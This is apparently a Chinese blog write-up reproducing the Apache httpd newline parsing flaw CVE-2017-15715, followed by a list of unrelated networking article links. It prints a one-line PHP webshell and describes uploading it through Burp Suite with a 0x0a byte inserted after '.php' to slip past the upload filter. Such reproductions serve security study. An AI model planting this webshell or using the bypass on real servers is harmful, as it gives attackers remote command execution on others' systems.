Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
van叶~3 分钟前
Linux网络-------1.socket编程基础---(TCP-socket)
linux·网络·tcp/ip
百川3 分钟前
Apache文件解析漏洞
web安全·apache
两圆相切1 小时前
ICMPv4报文类型详解表
网络·智能路由器
zhezhi5011 小时前
OSPF多区域介绍
网络·ospf多区域
Z7676_1 小时前
OSPF开放式最短路径优先
运维·网络
两圆相切1 小时前
ICMPv6报文类型详解表
网络
极地星光1 小时前
TCP/IP 网络编程面试题及解答
网络·网络协议·tcp/ip
誰能久伴不乏3 小时前
Linux 系统调用详解:操作文件的常用系统调用
服务器·网络·servlet
呉師傅5 小时前
佳能iR-ADV C5560复印机如何扫描文件到电脑
运维·网络·windows·计算机外设·电脑
半梦半醒*5 小时前
Linux网络管理
linux·运维·网络·centos·运维开发